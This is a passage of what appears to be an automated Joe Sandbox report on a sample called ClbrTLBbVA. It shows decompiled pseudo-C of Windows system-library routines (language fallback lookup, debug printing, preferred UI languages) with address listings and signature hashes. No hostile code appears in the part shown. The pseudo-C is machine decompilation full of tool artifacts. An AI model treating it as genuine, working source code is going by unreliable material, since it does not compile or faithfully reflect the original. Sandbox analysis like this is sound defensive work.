							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                        0x016ae620
                                        0x016ae628
                                        0x016ae62f
                                        0x016ae631
                                        0x016ae635
                                        0x016ae637
                                        0x016ae63e
                                        0x01705503
                                        0x01705503
                                        0x016ae64c
                                        0x016ae64c
                                        0x016ae651
                                        0x00000000
                                        0x00000000
                                        0x016ae661
                                        0x016ae665
                                        0x0170542a
                                        0x016ae715
                                        0x016ae71a
                                        0x016ae71c
                                        0x016ae720
                                        0x016ae720
                                        0x016ae727
                                        0x016ae736
                                        0x016ae736
                                        0x016ae743
                                        0x016ae743
                                        0x016ae673
                                        0x016ae678
                                        0x016ae67d
                                        0x016ae682
                                        0x016ae685
                                        0x016ae692
                                        0x016ae69b
                                        0x016ae6a3
                                        0x016ae6ad
                                        0x016ae6b1
                                        0x016ae6b2
                                        0x016ae6bb
                                        0x016ae6bf
                                        0x016ae6c0
                                        0x016ae6c8
                                        0x016ae6cc
                                        0x016ae6d5
                                        0x016ae6d9
                                        0x00000000
                                        0x00000000
                                        0x016ae6e5
                                        0x016ae6ea
                                        0x016ae6f9
                                        0x016ae70b
                                        0x016ae70f
                                        0x01705439
                                        0x0170545e
                                        0x0170545e
                                        0x00000000
                                        0x0170545e
                                        0x0170543b
                                        0x0170543e
                                        0x01705440
                                        0x01705445
                                        0x01705472
                                        0x01705475
                                        0x0170548d
                                        0x01705493
                                        0x017054a9
                                        0x00000000
                                        0x00000000
                                        0x017054ab
                                        0x017054b4
                                        0x017054bc
                                        0x017054c8
                                        0x017054de
                                        0x017054fb
                                        0x017054e0
                                        0x017054e6
                                        0x017054eb
                                        0x017054eb
                                        0x017054de
                                        0x00000000
                                        0x017054bc
                                        0x01705477
                                        0x0170547a
                                        0x01705480
                                        0x01705483
                                        0x01705486
                                        0x0170548b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0170548b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01705447
                                        0x01705447
                                        0x01705447
                                        0x01705447
                                        0x0170544e
                                        0x00000000
                                        0x00000000
                                        0x01705450
                                        0x01705452
                                        0x01705455
                                        0x0170545a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0170545c
                                        0x0170546a
                                        0x0170546d
                                        0x0170546f
                                        0x00000000
                                        0x0170546f
                                        0x016ae70f

                                        Strings
                                        • @, xrefs: 016AE6C0
                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 016AE68C
                                        • InstallLanguageFallback, xrefs: 016AE6DB
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                        • API String ID: 0-1757540487
                                        • Opcode ID: d21b31101ac39c8107033fbc92cf9525c7f0e3d584940457b3ff89ccb02bfa2a
                                        • Instruction ID: 3c828a5e819d4010211ff94b9d8bd428a54a0d263398c79737ca7b3a1a4b3aef
                                        • Opcode Fuzzy Hash: d21b31101ac39c8107033fbc92cf9525c7f0e3d584940457b3ff89ccb02bfa2a
                                        • Instruction Fuzzy Hash: 4751D172505306DBD711DF68C840ABBB7E9AF88614F45092EF985D7290FB31DD04CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016AB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E016AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x177f7a8);
				E016FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E016FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E016ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E016EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L016FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E016EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E016EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E016EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E016EA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                        0x016ab171
                                        0x016ab171
                                        0x016ab171
                                        0x016ab171
                                        0x016ab171
                                        0x016ab176
                                        0x016ab17b
                                        0x016ab180
                                        0x016ab186
                                        0x016ab18f
                                        0x016ab198
                                        0x016ab1a4
                                        0x016ab1aa
                                        0x01704802
                                        0x01704802
                                        0x01704805
                                        0x0170480c
                                        0x0170480e
                                        0x016ab1d1
                                        0x016ab1d3
                                        0x016ab1de
                                        0x016ab1de
                                        0x01704817
                                        0x0170481e
                                        0x01704820
                                        0x01704822
                                        0x01704822
                                        0x01704824
                                        0x01704824
                                        0x0170482a
                                        0x00000000
                                        0x00000000
                                        0x01704835
                                        0x0170483a
                                        0x0170483d
                                        0x0170483f
                                        0x01704842
                                        0x01704842
                                        0x01704842
                                        0x01704846
                                        0x0170484c
                                        0x0170484e
                                        0x01704851
                                        0x01704851
                                        0x01704853
                                        0x01704854
                                        0x01704854
                                        0x01704858
                                        0x0170485a
                                        0x0170485a
                                        0x0170485d
                                        0x0170485f
                                        0x01704861
                                        0x01704861
                                        0x01704866
                                        0x0170486b
                                        0x0170486e
                                        0x01704871
                                        0x01704876
                                        0x01704876
                                        0x01704878
                                        0x0170487b
                                        0x01704884
                                        0x01704884
                                        0x00000000
                                        0x0170487d
                                        0x0170487d
                                        0x01704882
                                        0x01704889
                                        0x01704889
                                        0x0170488f
                                        0x01704891
                                        0x017048e0
                                        0x017048e2
                                        0x017048e4
                                        0x017048e4
                                        0x017048e7
                                        0x017048e7
                                        0x017048ed
                                        0x017048f4
                                        0x017048f6
                                        0x01704951
                                        0x01704951
                                        0x01704953
                                        0x01704953
                                        0x01704956
                                        0x01704956
                                        0x01704958
                                        0x01704959
                                        0x01704959
                                        0x0170495d
                                        0x0170495d
                                        0x0170495f
                                        0x0170495f
                                        0x01704965
                                        0x01704969
                                        0x017049ba
                                        0x017049ba
                                        0x017049c1
                                        0x017049c5
                                        0x017049cc
                                        0x017049d4
                                        0x017049d7
                                        0x017049da
                                        0x017049e4
                                        0x017049e5
                                        0x017049f3
                                        0x01704a02
                                        0x00000000
                                        0x01704a02
                                        0x01704972
                                        0x01704974
                                        0x00000000
                                        0x00000000
                                        0x01704976
                                        0x01704979
                                        0x01704982
                                        0x01704983
                                        0x01704984
                                        0x0170498b
                                        0x0170498d
                                        0x01704991
                                        0x01704993
                                        0x01704999
                                        0x0170499d
                                        0x017049a2
                                        0x017049a2
                                        0x017049a2
                                        0x01704999
                                        0x017049ac
                                        0x00000000
                                        0x017049b3
                                        0x017048f8
                                        0x017048fe
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x017048fe
                                        0x01704895
                                        0x0170489c
                                        0x017048ad
                                        0x017048b2
                                        0x017048b5
                                        0x017048b7
                                        0x017048ba
                                        0x017048bc
                                        0x017048c6
                                        0x017048c6
                                        0x017048cb
                                        0x017048d1
                                        0x017048d4
                                        0x017048d8
                                        0x017048d8
                                        0x00000000
                                        0x017048d8
                                        0x017048be
                                        0x017048c0
                                        0x00000000
                                        0x00000000
                                        0x017048c2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x017048c4
                                        0x00000000
                                        0x01704882
                                        0x0170487b
                                        0x01704904
                                        0x01704906
                                        0x00000000
                                        0x00000000
                                        0x01704908
                                        0x0170490e
                                        0x00000000
                                        0x00000000
                                        0x01704910
                                        0x01704917
                                        0x01704917
                                        0x00000000
                                        0x01704917
                                        0x016ab1ba
                                        0x017047f9
                                        0x017047fc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x017047fc
                                        0x016ab1c0
                                        0x016ab1c0
                                        0x016ab1c3
                                        0x016ab1cb
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: _vswprintf_s
                                        • String ID:
                                        • API String ID: 677850445-0
                                        • Opcode ID: 43d1ebd65534e21aa8bae4290dfd9b6b419c0e7b8ed3945f36cc0d609377b2be
                                        • Instruction ID: 1365c882f44923dbcd07d15ebfe4c8c0daf4244d51c77bbc196b0ebfd77fda12
                                        • Opcode Fuzzy Hash: 43d1ebd65534e21aa8bae4290dfd9b6b419c0e7b8ed3945f36cc0d609377b2be
                                        • Instruction Fuzzy Hash: 7751BF71D1035ACEDB32CF688844BAEBBF1AF00710F1042ADDA5AAB2C2D7745A41DB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016CB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 76%
                                        			E016CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x179d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E016C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01778CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E016E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E016EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E016ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E016C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01778F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E016EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1798628; // 0x0
								_v68 = _t77;
								_t78 =  *0x179862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1798628; // 0x0
							_t116 =  *0x179862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                        0x016cb94c
                                        0x016cb956
                                        0x016cb95c
                                        0x016cb95e
                                        0x016cb964
                                        0x016cb969
                                        0x016cb96d
                                        0x016cb96d
                                        0x016cb970
                                        0x016cb974
                                        0x016cb97a
                                        0x016cbadf
                                        0x016cbadf
                                        0x016cbae2
                                        0x016cbae4
                                        0x016cbae6
                                        0x016cbaf0
                                        0x01712cb8
                                        0x016cbaf6
                                        0x016cbaf6
                                        0x016cbaf6
                                        0x016cbafd
                                        0x016cbb1f
                                        0x016cbb1f
                                        0x016cbaff
                                        0x016cbb00
                                        0x016cbb00
                                        0x016cbb03
                                        0x016cbb03
                                        0x016cbacb
                                        0x016cbacf
                                        0x016cbad0
                                        0x016cbad1
                                        0x016cbadc
                                        0x016cbadc
                                        0x016cb980
                                        0x016cb980
                                        0x016cb988
                                        0x016cb98b
                                        0x016cb98d
                                        0x016cb990
                                        0x016cb993
                                        0x016cb999
                                        0x016cb99b
                                        0x016cb9a1
                                        0x016cb9a5
                                        0x016cb9aa
                                        0x016cb9b0
                                        0x016cb9bb
                                        0x016cb9c0
                                        0x016cb9c3
                                        0x016cb9ca
                                        0x016cb9cc
                                        0x016cb9cf
                                        0x016cb9d3
                                        0x016cb9d7
                                        0x016cba94
                                        0x016cba94
                                        0x016cba98
                                        0x016cbaa3
                                        0x01712ccb
                                        0x016cbaa9
                                        0x016cbaa9
                                        0x016cbaa9
                                        0x016cbab1
                                        0x01712cd5
                                        0x01712cdd
                                        0x01712cdd
                                        0x016cbabb
                                        0x016cbabc
                                        0x016cbac2
                                        0x016cbac3
                                        0x016cbac3
                                        0x016cbac6
                                        0x00000000
                                        0x016cb9dd
                                        0x016cb9dd
                                        0x016cb9e7
                                        0x016cb9e7
                                        0x016cb9ec
                                        0x016cb9ec
                                        0x016cb9f1
                                        0x016cb9f5
                                        0x016cb9fa
                                        0x016cba00
                                        0x016cba0c
                                        0x016cba10
                                        0x016cba10
                                        0x016cba12
                                        0x016cba18
                                        0x00000000
                                        0x00000000
                                        0x016cbb26
                                        0x016cbb26
                                        0x016cba1e
                                        0x016cba1e
                                        0x016cba23
                                        0x016cba25
                                        0x016cba2c
                                        0x016cba30
                                        0x016cba35
                                        0x016cba35
                                        0x016cba41
                                        0x016cba46
                                        0x016cba4c
                                        0x016cba50
                                        0x016cba54
                                        0x016cba6a
                                        0x016cba6e
                                        0x016cba70
                                        0x016cba74
                                        0x016cba78
                                        0x016cba7a
                                        0x016cba7c
                                        0x016cba8e
                                        0x016cba90
                                        0x016cba92
                                        0x016cbb14
                                        0x016cbb14
                                        0x016cbb16
                                        0x016cbb16
                                        0x00000000
                                        0x016cba7c
                                        0x016cbb0a
                                        0x016cbb0d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016cbb0f

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016CB9A5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: 0e3087ed13c30d6ebc67a16268b07a5201b2d6f35718584467c9f903cf402e11
                                        • Instruction ID: 46401a784403993c435ac173df8404dcf754ff211b1f8a6220229692dea0acd8
                                        • Opcode Fuzzy Hash: 0e3087ed13c30d6ebc67a16268b07a5201b2d6f35718584467c9f903cf402e11
                                        • Instruction Fuzzy Hash: 5B515971A08341CFC720DF6DC88192AFBE5FB89A50F14896EEAC587355D731E845CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E016DFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E016BEEF0(0x1797b60);
					_t134 =  *0x1797b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1797b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1797b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E016B6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E016B76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01748938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E016AB150();
													}
													_t116 = E01746D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E016B75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1798638; // 0x0
																	_t122 = L016B38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E016B76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E016B76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L016DFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L016B70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
